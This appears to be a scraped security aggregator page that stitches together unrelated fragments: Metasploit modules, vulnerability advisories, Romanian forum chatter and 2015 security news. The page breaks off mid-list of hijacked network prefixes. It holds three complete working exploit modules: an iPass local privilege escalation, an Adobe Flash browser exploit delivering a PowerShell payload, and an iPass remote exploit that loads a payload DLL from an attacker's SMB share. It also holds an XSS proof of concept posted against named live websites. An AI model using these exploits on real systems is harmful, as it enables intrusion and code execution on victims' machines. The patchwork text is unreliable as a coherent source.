Aerosol

Full materials and proof of concept code has been released for the Security Explorations discovery of various Google app engine java security sandbox bypasses. Download pack: Download: Google App Engine Java Security Sandbox Bypasses ? Packet Storm

Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation Vendor: Safer-Networking Ltd. Product web page: http://www.safer-networking.org Affected version: 1.6.2 Summary: Spybot – Search & Destroy (S&D) is a spyware and adware removal computer program compatible with Microsoft Windows 95 and later. It scans the computer hard disk and/or RAM for malicious software. Desc: The application suffers from an unquoted search path issue impacting the service 'SBSDWSCService' for Windows deployed as part of Spybot S&D. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. Tested on: Microsoft Windows Ultimate 7 SP1 (EN) Vulnerability discovered by Aljaz Ceru aljaz@insec.si Advisory ID: ZSL-2015-5237 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5237.php 17.02.2015 --- C:\Users\user>sc qc SBSDWSCService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SBSDWSCService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : SBSD Security Center Service DEPENDENCIES : wscsvc SERVICE_START_NAME : LocalSystem C:\Users\user> Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper include Msf::Post::Windows::Priv include Msf::Post::Windows::Services def initialize(info={}) super(update_info(info, { 'Name' => 'iPass Mobile Client Service Privilege Escalation', 'Description' => %q{ The named pipe, \IPEFSYSPCPIPE, can be accessed by normal users to interact with the iPass service. The service provides a LaunchAppSysMode command which allows to execute arbitrary commands as SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => [ 'h0ng10' # Vulnerability discovery, metasploit module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows', { } ] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'References' => [ ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt'] ], 'DisclosureDate' => 'Mar 12 2015', 'DefaultTarget' => 0 })) register_options([ OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']) ], self.class) end def check os = sysinfo['OS'] unless os =~ /windows/i return Exploit::CheckCode::Safe end svc = service_info('iPlatformService') if svc && svc[:display] =~ /iPlatformService/ vprint_good("Found service '#{svc[:display]}'") if is_running? vprint_good('Service is running') else vprint_error('Service is not running!') end vprint_good('Opening named pipe...') handle = open_named_pipe('\\\\.\\pipe\\IPEFSYSPCPIPE') if handle.nil? vprint_error('\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found') return Exploit::CheckCode::Safe else vprint_good('\\\\.\\pipe\\IPEFSYSPCPIPE found!') session.railgun.kernel32.CloseHandle(handle) end return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def open_named_pipe(pipe) invalid_handle_value = 0xFFFFFFFF r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0) handle = r['return'] return nil if handle == invalid_handle_value handle end def write_named_pipe(handle, command) buffer = Rex::Text.to_unicode(command) w = client.railgun.kernel32.WriteFile(handle, buffer, buffer.length, 4, nil) if w['return'] == false print_error('The was an error writing to pipe, check permissions') return false end true end def is_running? begin status = service_status('iPlatformService') rescue RuntimeError => e print_error('Unable to retrieve service status') return false end return status && status[:state] == 4 end def exploit if is_system? fail_with(Failure::NoTarget, 'Session is already elevated') end handle = open_named_pipe("\\\\.\\pipe\\IPEFSYSPCPIPE") if handle.nil? fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found") else print_status("Opended \\\\.\\pipe\\IPEFSYSPCPIPE! Proceeding...") end if datastore['WritableDir'] and not datastore['WritableDir'].empty? temp_dir = datastore['WritableDir'] else temp_dir = client.sys.config.getenv('TEMP') end print_status("Using #{temp_dir} to drop malicious exe") begin cd(temp_dir) rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Config, "Failed to use the #{temp_dir} directory") end print_status('Writing malicious exe to remote filesystem') write_path = pwd exe_name = "#{rand_text_alpha(10 + rand(10))}.exe" begin write_file(exe_name, generate_payload_exe) register_file_for_cleanup("#{write_path}\\#{exe_name}") rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}") end print_status('Sending LauchAppSysMode command') begin write_res = write_named_pipe(handle, "iPass.EventsAction.LaunchAppSysMode #{write_path}\\#{exe_name};;;") rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, 'Failed to write to pipe') end unless write_res fail_with(Failure::Unknown, 'Failed to write to pipe') end end end Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000' include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player PCRE Regex Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error in the PCRE engine, specifically in the handling of the \c escape sequence when followed by a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mark Brand', # Found vuln 'sinn3r' # MSF ], 'References' => [ [ 'CVE', '2015-0318' ], [ 'URL', 'http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html' ], [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=199' ] ], 'Payload' => { 'Space' => 1024, 'DisableNops' => true }, 'DefaultOptions' => { 'Retries' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :clsid => "{#{CLASSID}}", :method => "LoadMovie", :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, # Ohter versions are vulnerable but .235 is the one that works for me pretty well # So we're gonna limit to this one for now. More validation needed in the future. :flash => lambda { |ver| ver == '16.0.0.235' } }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Nov 25 2014", 'DefaultTarget' => 0)) end def exploit # Please see data/exploits/CVE-2015-0318/ for source, # that's where the actual exploit is @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status("Sending SWF...") send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) return end print_status("Sending HTML...") tag = retrieve_tag(cli, request) profile = get_profile(tag) profile[:tried] = false unless profile.nil? # to allow request the swf send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) html_template = %Q|<html> <body> <object classid="clsid:#{CLASSID}" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0318", "Main.swf" ) swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Source

Ba da voi chiar nu vedeti ca au ajuns sa dea email-uri la ziare de rahat sa publice stiri despre ei, numa, numa sa se vorbeasca iar de ei. Sincer e trist frate, problabil ca la CSD pe langa TinKode si Madalin mai sunt baieti muncitori care se fac practic de ras o data cu brand-ul...

Salut si bine ai venit. @B10S i-am dat eu deja invitatie.

Salut si bine ai venit. ( cati ani ai, cunostiinte ? )

Yahoo has launched an on-demand password service that lets forgetful customers tie their account security to their mobile phone. Yahoo director of product management Chris Stoner announced the service, which US users can opt into now. The 'On-demand passwords' feature can be activated in the security section of Yahoo accounts' settings menu. Once activated, the user will be instructed to enter their mobile phone number. From this point on, whenever the customer attempts to open their account Yahoo will send a custom unlock code to their phone, removing the need for them to remember a password. Stoner said the service is part of Yahoo's ongoing efforts to make account security easier for users. "We've all been there. You're logging into your email and you panic because you've forgotten your password. After racking your brain for what feels like hours, it finally comes to you. Phew," he said. "Today, we're hoping to make that process less anxiety-inducing by introducing on-demand passwords, which are texted to your mobile phone when you need them. You no longer have to memorise a difficult password to sign in to your account - what a relief." The service is available to US users now. There is no confirmed UK release date and at the time of publishing Yahoo had not responded to V3's request for comment on when it will roll out the service in Europe. The release follows reports that many users are still failing to take even basic cyber defence measures to protect their personal data. Yahoo CEO Marissa Mayer controversially revealed she does not lock her smartphone with a password or gesture, as it made unlocking the device "too time-consuming". Yahoo is one of many companies to experiment with alternative password security services. Apple and Samsung added biometric fingerprint scanners to their latest iPhone 6 and Galaxy S6 smartphones. Source

______________________________________________________________________ -------------------------- NSOADV-2015-001 --------------------------- Jolla Phone tel URI Spoofing ______________________________________________________________________ ______________________________________________________________________ 111101111 11111 00110 00110001111 111111 01 01 1 11111011111111 11111 0 11 01 0 11 1 1 111011001 11111111101 1 11 0110111 1 1111101111 1001 0 1 10 11 0 10 11 1111111 1 111 111001 111111111 0 10 1111 0 11 11 111111111 1 1101 10 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 0111111110 0110 1110 1 0 11101111111111111011 11100 00 01111 0 10 1110 1 011111 1 111111111111111111111101 01 01110 0 10 111110 110 0 11101111111111111111101111101 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 111110110 10 0111110 1 0 0 1111111111111111111111111 110 111 11111 1 1 111 1 10011 101111111111011111111 0 1100 111 10 110 101011110010 11111111111111111111111 11 0011100 11 10 001100 0001 111111111111111111 10 11 11110 11110 00100 00001 10 1 1111 101010001 11111111 11101 0 1011 10000 00100 11100 00001101 0 0110 111011011 0110 10001 101 11110 1011 1 10 101 000001 01 00 1010 1 11001 1 1 101 10 110101011 0 101 11110 110000011 111 ______________________________________________________________________ ______________________________________________________________________ Title: Jolla Phone tel URI Spoofing Severity: Low Advisory ID: NSOADV-2015-001 Date Reported: 2015-01-29 Release Date: 2015-03-13 Author: Nikolas Sotiriu Website: http://sotiriu.de Twitter: http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL: http://sotiriu.de/adv/NSOADV-2015-001.txt Vendor: Jolla (https://www.jolla.com/) Affected Products: Jolla Phone Affected Versions: <= Sailfish OS 1.1.1.27 (Vaarainjärvi) Remote Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Description: ============ The Sailfish OS of the Jolla Phone contains a vulnerability that allows to spoof the phone number, passed by a tel URI through an A HREF of a website with some spaces (HTML ). This could be used to trick a victim to dial a premium-rate telephone number, for example. Proof of Concept: ================= <a href="tel:0000000000[25xSpaces]Spoofed Text[38Spaces]aaaaa">Call</a> Test Site http://sotiriu.de/demos/callspoof.html Solution: ========= Install Version 1.1.2.16 (Yliaavanlampi) https://together.jolla.com/question/82037/release-notes-upgrade-112- yliaavanlampi-early-access/ Disclosure Timeline: ==================== 2015-01-28: Asked for a PGP Key (security@jolla.com) 2015-01-29: Got the PGP Key 2015-01-29: Sent vulnerability information to vendor 2015-01-29: Feedback that the vendor is looking into the problem 2015-01-30: Got detailed information about the patch process and timeline 2015-02-19: Got an E-Mail that the patched version is released 2015-03-13: Release of this advisory Source

HostingTakip v3.0 - Stored XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com Love to _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu ( milw00rm.com ) ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : HostingTakip |~Affected Version : v3.0 |~Software : http://www.hostingtakip.com & http://wmscripti.com/php-scriptler/hostingtakip-hosting-yonetim-scripti.html |~Official Demo : http://hostingtakip.teknoder.com/demo/ |~RISK : Medium |~Tested On : [L] Windows 7, Mozilla Firefox ####################INFO################################ XSS payload is possible to run in your registration form. click on "Yeni Mü?teri" Here the e-mail section appears unprotected been no filtering Any payload code to enter "uye-duzenle.php" on will be permanent and will work ######################################################## Tested on; http://www.ayashosting.com http://www.oneritasarim.com/hostingtakip/ ---------------------------------------------------------- Proof image: http://i.hizliresim.com/mGZzQ8.png ---------------------------------------------------------- Request ---------------------------------------------------------- POST http://www.oneritasarim.com/hostingtakip/kayit_tamamla.php Request Headers: Host[www.oneritasarim.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://www.oneritasarim.com/hostingtakip/y_kullanici.php] Cookie[PHPSESSID=1b4b474c7fc50e0885aae61274ac0b55; __utma=221857094.828791546.1426246879.1426246879.1426246879.1; __utmc=221857094; __utmz=221857094.1426246879.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)] Connection[keep-alive] Post Data: kadi[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E] posta[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E] sifre[123456] ad[123456] tc[012345678901] tel[12345678901] mustip[b] sehir[h4] ilce[h4] adres[h4x0resec.blogspot.com] hakkimda[h4] guv[1b4b47] B1[G%F6nder] Response Headers: Content-Encoding[gzip] Vary[Accept-Encoding] Date[Fri, 13 Mar 2015 12:18:10 GMT] Server[LiteSpeed] Connection[close] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Content-Type[text/html] Content-Length[143] Source

Adobe this afternoon pushed out a Flash Player update patching 11 critical security vulnerabilities, most of which lead to remote code execution. None are being publicly exploited, Adobe said. Versions 16.0.0.305 and earlier of the Flash Player Desktop and Flash Player for Google Chrome are affected on Windows and Mac OS X machines, as is Flash Player for Internet Explorer 10 and 11 on Windows 8 and 8.1 computers. Flash Player 11.2.202.442 for Linux and Flash Player Extended Support Release 13.0.0.269 for Windows and Mac OS X are also affected. The updated Flash Player includes patches for four memory corruption vulnerabilities, three of which reported by Google’s Project Zero, that lead to remote code execution. Two other type-confusion vulnerabilities, two use-after free vulnerabilities and an integer-overflow vulnerability were also patched; all could have resulted in remote code execution as well, Adobe said. The update also patches a cross-domain policy bypass vulnerability and a file-upload restriction bypass vulnerability. Today’s Adobe patches come on the heels of a busy week for IT administrators following Microsoft’s security bulletin rollout on Tuesday. Microsoft released 14 bulletins, five of them critical, and included patches for the FREAK vulnerability and a new fix for some unresolved issues left behind by the Stuxnet patch of 2010. Source

The federal government is seeking more legal power to step in and shut down botnets through an amendment to the existing criminal law, which would allow the Department of Justice to obtain injunctions to disrupt these malicious networks. The Obama administration has proposed an amendment to existing United Stated federal law that would give it a more powerful tool to go after botnets such as GameOver Zeus, Asprox and others. In recent years, Justice, along with private security firms and law enforcement agencies in Europe, have taken down various incarnations of a number of major botnets, including GameOver Zeus and Coreflood. These actions have had varying levels of success, with the GOZ takedown being perhaps the most effective, as it also had the effect of disrupting the infrastructure used by the CryptoLocker ransomware. As part of those takedown operations, the Department of Justice files civil lawsuits against alleged operators of the botnets, and sometimes their hosting providers, and also obtains injunctions that enable the government to sinkhole C2 servers or take physical control of those machines. Now, the administration would like to expand those powers. “One powerful tool that the department has used to disrupt botnets and free victim computers from criminal malware is the civil injunction process. Current law gives federal courts the authority to issue injunctions to stop the ongoing commission of specified fraud crimes or illegal wiretapping, by authorizing actions that prevent a continuing and substantial injury. This authority played a crucial role in the department’s successful disruption of the Coreflood botnet in 2011 and the Gameover Zeus botnet in 2014,” Leslie R. Caldwell, assistant attorney general in the criminal division at the Department of Justice, wrote in a blog post explaining the administration’s position. “The problem is that current law only permits courts to consider injunctions for limited crimes, including certain frauds and illegal wiretapping. Botnets, however, can be used for many different types of illegal activity. They can be used to steal sensitive corporate information, to harvest email account addresses, to hack other computers, or to execute DDoS attacks against web sites or other computers. Yet — depending on the facts of any given case — these crimes may not constitute fraud or illegal wiretapping. In those cases, courts may lack the statutory authority to consider an application by prosecutors for an injunction to disrupt the botnets in the same way that injunctions were successfully used to incapacitate the Coreflood and Gameover Zeus botnets.” In order to obtain an injunction in these cases, the government would need to sue the defendants in civil court and show that its suit is likely to succeed on its merits. “The Administration’s proposed amendment would add activities like the operation of a botnet to the list of offenses eligible for injunctive relief. Specifically, the amendment would permit the department to seek an injunction to prevent ongoing hacking violations in cases where 100 or more victim computers have been hacked. This numerical threshold focuses the injunctive authority on enjoining the creation, maintenance, operation, or use of a botnet, as well as other widespread attacks on computers using malicious software (such as “ransomware” ),” Caldwell wrote. One hundred machines is a low number for a botnet, and indeed would barely even qualify as a botnet in today’s environment, which includes many networks comprising hundreds of thousands or millions of compromised PCs. Mark Jaycox, a legislative analyst for the EFF, said that the proposal from the Obama administration may be overreaching. “The blog post posits that IP/trade secret concerns are reasons that are not already covered to take down botnets. That’s a civil/private context and we’ve seen private companies use the Lanham Act to handle that angle. Seems like the DOJ is pushing for a more expansive law. As of now, we’ve seen DOJ been able to handle takedowns with the resources and laws that are already provided to them,” Jaycox said. “We’d like to see a particular use case where they couldn’t use their already aggressive interpretation of the current law to take down botnets. If anything, we should be narrowing the current anti-hacking statute and computer laws because of their excessive breadth.” Source

Gamers may soon be feeling the pain of crypto-ransomware. A variant of CryptoLocker is in the wild that goes after data files associated with 20 different online games, locking downloadable content in an attempt to target younger computer users. Researchers at Bromium today said an unnamed compromised website is serving the malware. Victims are redirected by a Flash exploit to a site hosting the Angler exploit kit, and Angler drops the CryptoLocker variant. “The website is based on WordPress and could have been compromised by any one of the numerous WP exploits,” wrote Vadim Kotov in an advisory for Bromium. “Additionally, the URL where the malicious Flash file is hosted keeps changing.” Kotov said the attackers forgo typical iframe redirects and instead use a Flash file wrapped in an invisible div tag, likely in an attempt to evade detection. The malware proceeds through a number of checks for the presence of virtual machines or antivirus before dropping a Flash exploit for CVE-2015-0311 or an Internet Explorer exploit CVE-2013-2551. The malware behaves like a typical CryptoLocker infection, presenting the victim with a banner explaining that files have been encrypted, and a ransom must be paid with Bitcoin in order for a decryption key to be sent to the victim. There are also instructions to make payments over Tor if the decryption site is not working. More than 50 file extensions associated with video games are targeted by this variant, in addition to images, documents, iTunes files and more. A number of popular single-player games including Call of Duty, Minecraft, Half Life 2, Elder Scrolls, Skyrim, Assassin’s Creed and others are affected, as are online games such as World of Warcraft, Day Z and League of Legends, as well as a number of EA Sports, Valve and Bethesda games. Steam gaming software is also in the crosshairs, Bromium said. “Encrypting all these games demonstrates the evolution of crypto-ransomware as cybercriminal target new niches. Many young adults may not have any crucial documents or source code on their machine (even photographs are usually stored at Tumblr or Facebook), but surely most of them have a Steam account with a few games and an iTunes account full of music,” Kotov wrote. “Non gamers are also likely to be frustrated by these attacks if they lose their their personal data.” Some of the files the variant goes after are often impossible to restore; those include user profile data, saved games, in-game maps and mods, Kotov wrote. The Bromium advisory goes into more detail about command and control communication and encryption mechanisms. The experts advise gamers to back up their files on an external hard drive that is not connected to the Internet. “As more file categories are infected, a broader audience is affected,” Kotov said. “The attackers are also getting better at incorporating BitCoin code directly into their projects, which isn’t a good sign.” Source

Mozilla has released an open source memory forensics tool that some college students designed and built during the company’s recent Winter of Security event. The new tool, known as Masche, is designed specifically for investigating server memory and has the advantage of being able to scan running processes without causing any problems with the machine. Masche runs on Linux, OS X and Windows and Mozilla has posted the code on GitHub. “Masche provides basic primitives for scanning the memory of processes without disrupting the normal operations of a system. Compared with frameworks like Volatility or Rekall, Masche does not provide the same level of advanced forensics features. Instead, it focuses on searching for regexes and byte strings in the processes of large pools of systems, and does so live and very fast,” Julien Vehent wrote in a blog post. “The effort needed to implement a complex scanning solution across three operating systems, and complete this work in just a few months, was no easy feat.” The new forensics library is the work of a group of students at the University of Buenos Aires, and can be seen as a kind of companion tool to Mozilla’s InvestiGator. The MIG is more of a platform than a discrete tool, and it’s meant for investigating issues remotely. “MIG is composed of agents installed on all systems of an infrastructure. The agents can be queried in real-time using a messenging protocol implemented in the MIG Scheduler. MIG has an API, a database, RabbitMQ relays, a terminal console and command line clients. It allows investigators to send actions to pools of agents, and check for indicator of compromise, verify the state of a configuration, block an account, create a firewall rule, update a blacklist and so on,” the InvestiGator documentation says. Masche is meant to be a module on the MIG platform and Mozilla is now integrating the forensics tool into that platform. Source

The Cyber Security Challenge final has launched, tasking 42 amateur white hats to regain control of a naval gun system on board HMS Belfast as a part of a simulated cyber attack by the 'Flag Day Associates' hacktivist group. The final challenge is the brainchild of experts from GCHQ, the National Crime Agency, Lockheed Martin, Airbus Group, PGI, C3IA and Palo Alto Networks (in partnership with BT). The finalists will attempt to regain control of a gun system which has been hacked remotely and forced to target London's City Hall. Contestants will also be required to find similar security holes in a simulated water treatment and manufacturing facility using industry-standard tools, such as the Kali Linux distribution. The winner will be crowned on Friday. The simulation is the final round in the fifth Cyber Security Challenge, which has seen "thousands" of entrants combat the Flag Day Associates in a variety of fictional situations. The challenge is designed to help businesses and government departments spot talented individuals and recruit them into cyber security. Stephanie Daman, CEO of the Cyber Security Challenge, said that many of 2014's finalists now have cyber security jobs. "Around half of last year's finalists are already in their first cyber security jobs, whilst the majority of the rest are well on their way, taking training courses, accreditations or internships to boost their CVs. There is no reason why all 42 of our finalists today can't follow in their footsteps." Past winners include 19-year-old student William Shackleton and chemist Stephen Miller. Cabinet Office minister Francis Maude listed the high turnout and success of participants finding cyber security jobs as proof of the challenge's success. "Today's competition highlights the very best new cyber security talent as they are challenged by a set of exciting and innovative scenarios developed by GCHQ alongside industry experts," he said. "Government and business need skilled and talented people to feed the demand for better cyber security in the UK. "This competition is the biggest and best yet, and events like this play an important role in providing the next generation of cyber professionals." The challenge final follows a wider push by the UK government to better defend critical infrastructure systems against cyber attacks. The UK and US governments announced plans to mount a series of simulated cyber war games in January with the intention of bolstering critical infrastructure systems. The initiatives follow warnings that the cyber threat facing critical infrastructure is growing. The US Industrial Control Systems Cyber Emergency Response Team revealed on Thursday that US industrial control systems were hit by cyber attacks at least 245 times over a 12-month period. Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'IPass Control Pipe Remote Command Execution', 'Description' => %q{ This module exploits a vulnerability in the IPass Client service. This service provides a named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused to force the service to load a DLL from a SMB share. }, 'Author' => [ 'Matthias Kaiser', # Vulnerability discovery 'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-0925' ], [ 'OSVDB', '117423' ], [ 'BID', '72265' ], [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Windows x32', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'Privileged' => true, 'DisclosureDate' => 'Jan 21 2015', 'DefaultTarget' => 0)) register_options( [ OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') end def check echo_value = rand_text_alphanumeric(rand(10) + 10) begin response = send_command("System.Echo #{echo_value}") if response =~ Regexp.new(echo_value) return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Unknown end rescue Rex::ConnectionError => e vprint_error("Connection failed: #{e.class}: #{e}") return Msf::Exploit::CheckCode::Unknown rescue Rex::Proto::SMB::Exceptions::LoginError => e vprint_error('Connection reset during login') return Msf::Exploit::CheckCode::Unknown end end def setup super self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll" self.share = Rex::Text.rand_text_alpha(5) end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}") end def send_command(command) # The connection is closed after each command, so we have to reopen it connect smb_login pipe = simple.create_pipe('\\IPEFSYSPCPIPE') pipe.write(Rex::Text.to_unicode(command)) response = Rex::Text.to_ascii(pipe.read) response end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) { super } rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end Source

Internet traffic for 167 important British Telecom customers—including a UK defense contractor that helps deliver the country's nuclear warhead program—were mysteriously diverted to servers in Ukraine before being passed along to their final destination. The snafu may have allowed adversaries to eavesdrop on or tamper with communications sent and received by the UK's Atomic Weapons Establishment, one of the affected British Telecom customers. Other organizations with hijacked traffic include defense contractor Lockheed Martin, Toronto Dominion Bank, Anglo-Italian helicopter company AgustaWestland, and the UK Department for Environment, according to a blog post published Friday by researchers from Dyn, a firm that helps companies monitor and control their online infrastructure. The diverted traffic appeared to be used to send e-mail and route virtual private networks, as well as for other purposes. As the picture above illustrates, the roundabout path caused the data to travel thousands of miles to the Ukrainian capital of Kiev before turning around, retracing that route, and being delivered to its normal hub in London. Unnecessarily sending the data to Kiev may have made it possible for employees with privileged network access to Ukrainian telecom provider Vega to monitor or tamper with data that wasn't encrypted end-to-end using strong cryptography. The hijacking of the Atomic Weapons Establishment, Lockheed, and the other 165 routes occurred over a 90-minute span on Thursday, while a handful of British Telecom customers experienced diverted traffic for five days beginning Saturday. "The 167 hijacked prefixes (listed below) also included more innocuous networks like those of Pepsi Cola (165.197.56.0/22) and Wal-Mart UK (161.163.166.0/24 and 161.163.177.0/24)," Dyn Director of Internet analysis Doug Madory wrote. "However, these networks do host domains with 'VPN' and 'mail' in their names, implying they provide important services for these companies. Does this list represent some curious mistake or something more? Either way, it redirected a portion of Internet traffic bound for networks, at a minimum resulting in poor performance for some customers." It's not the first time that significant chunks of Internet traffic have been diverted to distant locations for unexplained reasons. In late 2013, Dyn researchers reported that data belonging to financial institutions, government agencies, and network service providers were mysteriously redirected to routers at Belarusian or Icelandic service providers. The hijackings occurred during at least 38 distinct events over a nine-month span that began in February of that year. The diversions are the result of the implicit trust placed in the border gateway protocol used to exchange data between large service providers and their customers, which include financial institutions, governments, network service providers, pharmaceutical and aerospace companies, and other sensitive organizations. As Ars explained in November, 2013: The full list of 167 customers affected is: 212.162.232.0/24 Cofunds Ltd (GB) 148.253.220.0/23 Department for Environment, Food and Rural Affairs (DEFRA) (GB) 61.28.211.0/24 Servcorp (GB) 86.128.0.0/11 BT Infrastructure Layer (GB) 86.128.0.0/12 BT Infrastructure Layer (GB) 193.32.254.0/24 Marks and Spencer PLC (GB) 194.70.94.0/24 Dabs Direct PLC (GB) 148.252.5.0/24 Department for Environment, Food and Rural Affairs (DEFRA) (GB) 37.235.123.0/24 Submission Technology Ltd (GB) 194.169.34.0/24 AgustaWestland Ltd (GB) 81.128.0.0/12 BT Infrastructure Layer (GB) 143.159.0.0/16 INFONET Services Corporation (GB) 147.148.0.0/14 Various Registries (Maintained by ARIN) (GB) 193.46.221.0/24 Continental DataGraphics Ltd (GB) 132.153.3.0/24 Atomic Weapons Establishment (GB) 194.169.69.0/24 BUILDING DESIGN PARTNERSHIP LIMITED (GB) 91.230.16.0/24 Dairy Crest Ltd (GB) 193.32.48.0/24 Virgin Money plc (GB) 193.36.240.0/24 Allen and Overy LLP (GB) 192.19.187.0/24 Avago Technologies U.S. Inc. (GB) 31.48.0.0/13 BT Public Internet Service (GB) 195.171.0.0/16 BT Public Internet Service (GB) 132.153.254.0/24 Atomic Weapons Establishment (GB) 213.120.0.0/14 BT Public Internet Service (GB) 91.223.126.0/24 Evolving Systems Limited (GB) 116.66.140.0/22 Cognizant Technology Solution India Pvt Ltd, India (GB) 81.128.0.0/11 BT Public Internet Service (GB) 195.182.62.0/24 The Football Association Ltd (GB) 185.30.8.0/22 Satellite Applications Catapult Limited (GB) 86.128.0.0/10 BT Public Internet Service (GB) 147.152.0.0/16 British Telecommunications PLC 